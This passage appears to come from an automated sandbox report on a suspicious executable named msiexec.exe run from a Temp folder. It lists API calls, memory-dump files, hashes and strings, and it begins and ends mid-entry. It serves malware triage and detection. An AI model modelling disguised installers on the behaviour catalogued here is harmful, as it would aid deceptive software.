            • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404115
            • LoadCursorA.USER32 ref: 00404122
            • SetCursor.USER32(00000000), ref: 00404125
            • SendMessageA.USER32 ref: 00404151
            • SendMessageA.USER32 ref: 00404165
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
            • String ID: N$hjgjhad$open
            • API String ID: 3615053054-1121083075
            • Opcode ID: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
            • Instruction ID: 0605a8af88f24b8a239437e517aaa265f180be2417519ff34b25117700073a86
            • Opcode Fuzzy Hash: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
            • Instruction Fuzzy Hash: D161C1B1A40209BBEB109F60DD45F6A3B69FF54715F108036FB01BA2D1C7B8A991CF98
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
            • BeginPaint.USER32(?,?), ref: 00401047
            • GetClientRect.USER32 ref: 0040105B
            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
            • FillRect.USER32 ref: 004010E4
            • DeleteObject.GDI32(?), ref: 004010ED
            • CreateFontIndirectA.GDI32(?), ref: 00401105
            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
            • SelectObject.GDI32(00000000,?), ref: 00401140
            • DrawTextA.USER32(00000000,0042E360,000000FF,00000010,00000820), ref: 00401156
            • SelectObject.GDI32(00000000,00000000), ref: 00401160
            • DeleteObject.GDI32(?), ref: 00401165
            • EndPaint.USER32(?,?), ref: 0040116E
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
            • String ID: F
            • API String ID: 941294808-1304234792
            • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
            • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
            • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
            • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
              • Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
              • Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C
            • CloseHandle.KERNEL32(00000000), ref: 004057A7
            • GetShortPathNameA.KERNEL32 ref: 004057B0
            • GetShortPathNameA.KERNEL32 ref: 004057CD
            • wsprintfA.USER32 ref: 004057EB
            • GetFileSize.KERNEL32(00000000,00000000,0042BBE8,C0000000,00000004,0042BBE8,?,?,?,00000000,000000F1,?), ref: 00405826
            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405835
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040584B
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E8,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405891
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004058A3
            • GlobalFree.KERNEL32(00000000), ref: 004058AA
            • CloseHandle.KERNEL32(00000000), ref: 004058B1
              • Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
              • Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
            • String ID: %s=%s$[Rename]
            • API String ID: 3772915668-1727408572
            • Opcode ID: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
            • Instruction ID: 426fb2abaf3c2c6495405564ff4e517f65c757b77f6bed08917e1be6c8ffeb7f
            • Opcode Fuzzy Hash: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
            • Instruction Fuzzy Hash: 6341FF32606B15ABE3206B619C49F6B3A5CDF80705F004436FD05F62C2E678E8118EBD
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetDlgItem.USER32(?,000003FB), ref: 00404248
            • SetWindowTextA.USER32(?,?), ref: 00404275
            • SHBrowseForFolderA.SHELL32(?,004293B0,?), ref: 0040432A
            • CoTaskMemFree.OLE32(00000000), ref: 00404335
            • lstrcmpiA.KERNEL32(hjgjhad,00429FE0,00000000,?,?), ref: 00404367
            • lstrcatA.KERNEL32(?,hjgjhad), ref: 00404373
            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404383
              • Part of subcall function 004052B1: GetDlgItemTextA.USER32 ref: 004052C4
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CC6
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD3
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD8
              • Part of subcall function 00405C6E: CharPrevA.USER32(?,?), ref: 00405CE8
            • GetDiskFreeSpaceA.KERNEL32(00428FA8,?,?,0000040F,?,00428FA8,00428FA8,?,00000000,00428FA8,?,?,000003FB,?), ref: 0040443C
            • MulDiv.KERNEL32 ref: 00404457
            • SetDlgItemTextA.USER32(00000000,00000400,00428F98), ref: 004044D0
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
            • String ID: A$hjgjhad
            • API String ID: 2246997448-1285462269
            • Opcode ID: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
            • Instruction ID: 52dfe11e264a0fce323933678d720eed1997f61c196974170264a293bd140da1
            • Opcode Fuzzy Hash: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
            • Instruction Fuzzy Hash: 19915FB1A00219ABDF11AFA1CC85AAF7BB8EF84315F10407BFA00B6291D77C99418F59
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetVersion.KERNEL32(?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405AD6
            • GetSystemDirectoryA.KERNEL32(hjgjhad,00000400), ref: 00405B51
            • GetWindowsDirectoryA.KERNEL32(hjgjhad,00000400), ref: 00405B64
            • SHGetSpecialFolderLocation.SHELL32(?,0041D988), ref: 00405BA0
            • SHGetPathFromIDListA.SHELL32(0041D988,hjgjhad), ref: 00405BAE
            • CoTaskMemFree.OLE32(0041D988), ref: 00405BB9
            • lstrcatA.KERNEL32(hjgjhad,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BDB
            • lstrlenA.KERNEL32(hjgjhad,?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405C2D
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$hjgjhad
            • API String ID: 900638850-281039111
            • Opcode ID: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
            • Instruction ID: e3937826694aa96a66c9679703be47664347117baa65301e61951ea2719d1281
            • Opcode Fuzzy Hash: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
            • Instruction Fuzzy Hash: DB51F331A04B05AAEF219B689C84BBF3BB4DB15314F54423BE912B62D0D27C6D42DF4E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Char$Next$Prev
            • String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
            • API String ID: 589700163-2275829841
            • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
            • Instruction ID: 3b67653c5ee308ebbdbeafcda2e7905df7fa5ba98b11233f7c0ae47683edab57
            • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
            • Instruction Fuzzy Hash: 0811905180CB912EFB3206245D44BB7BF89CB567A0F58447BE9C5B22C2CA7C5C429A6D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
            • String ID:
            • API String ID: 2320649405-0
            • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
            • Instruction ID: df06335cf3b4afc37a3544ae2d30c5d34a8579c70edf0d6bae8496df32602c64
            • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
            • Instruction Fuzzy Hash: DC219671904709ABCB219F78DD08B4B7FF8AF00715F048A29F855E22E0D338E904CB95
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
            • GlobalFree.KERNEL32(?), ref: 00402725
            • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66), ref: 00402737
            • GlobalFree.KERNEL32(00000000), ref: 0040273E
            • CloseHandle.KERNEL32(FFFFFD66), ref: 00402756
            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
            • String ID:
            • API String ID: 3294113728-0
            • Opcode ID: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
            • Instruction ID: 62f2159171fbc9033078dd1539b67ba065abfcd1800d5973976be9d0b9eda31e
            • Opcode Fuzzy Hash: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
            • Instruction Fuzzy Hash: DE319F71C00128BBDF216FA5CD89EAE7E78EF04364F10422AF524772E0C7795D419BA9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
            • lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
            • lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041D988,756F110C), ref: 00404E06
            • SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
            • SendMessageA.USER32 ref: 00404E3E
            • SendMessageA.USER32 ref: 00404E58
            • SendMessageA.USER32 ref: 00404E66
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: MessageSend$lstrlen$TextWindowlstrcat
            • String ID:
            • API String ID: 2531174081-0
            • Opcode ID: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
            • Instruction ID: 64f14355eea1465708e63b557f2fc924fecf56a011f776fb8de10cf69f9f2b8c
            • Opcode Fuzzy Hash: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
            • Instruction Fuzzy Hash: F7216071A00118BBDB119FA9DD85ADEBFA9FF44354F14807AF904B6290C7398E418F98
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Message$Send$ClientScreen
            • String ID: f
            • API String ID: 41195575-1993550816
            • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
            • Instruction ID: b5388fb2048f9adb4f66bcd81e9da03b2d8faafec29f08353259a6dacb87349b
            • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
            • Instruction Fuzzy Hash: 0E014071D00219BADB00DB94DC45BEEBBB8AB59711F10016ABA11B61C0D7B865418BA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
            • MulDiv.KERNEL32 ref: 00402B81
            • wsprintfA.USER32 ref: 00402B91
            • SetWindowTextA.USER32(?,?), ref: 00402BA1
            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
            Strings
            • verifying installer: %d%%, xrefs: 00402B8B
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Text$ItemTimerWindowwsprintf
            • String ID: verifying installer: %d%%
            • API String ID: 1451636040-82062127
            • Opcode ID: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
            • Instruction ID: 3d98ddf4d84b742d5460afe4edfb6d9be597fa80bf04213b3bc288f28cb5f5da
            • Opcode Fuzzy Hash: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
            • Instruction Fuzzy Hash: 82014470A40209ABDB209F60DD09FAE3779BB04345F008039FA06A92D1D7B8AA558F99
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
              • Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
              • Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
              • Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041D988,756F110C), ref: 00404E06
              • Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66
            • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
            • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401F9C
            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
            • String ID: B
            • API String ID: 2987980305-3806887055
            • Opcode ID: 490023839bc4c26c6d0a328ae6bba471d879ed123e61d6ca81d8e7277a746500
            • Instruction ID: bf94c0598684f4a2e8798aed6ecd64900ad0f6fcd097f114c8a1beddd358b100
            • Opcode Fuzzy Hash: 490023839bc4c26c6d0a328ae6bba471d879ed123e61d6ca81d8e7277a746500
            • Instruction Fuzzy Hash: 5121EE72D04216EBCF107FA5CE49A6E75B06F45358F20433BF511B62E1C77C4941A65E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 00402341
            • lstrlenA.KERNEL32(fd ,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
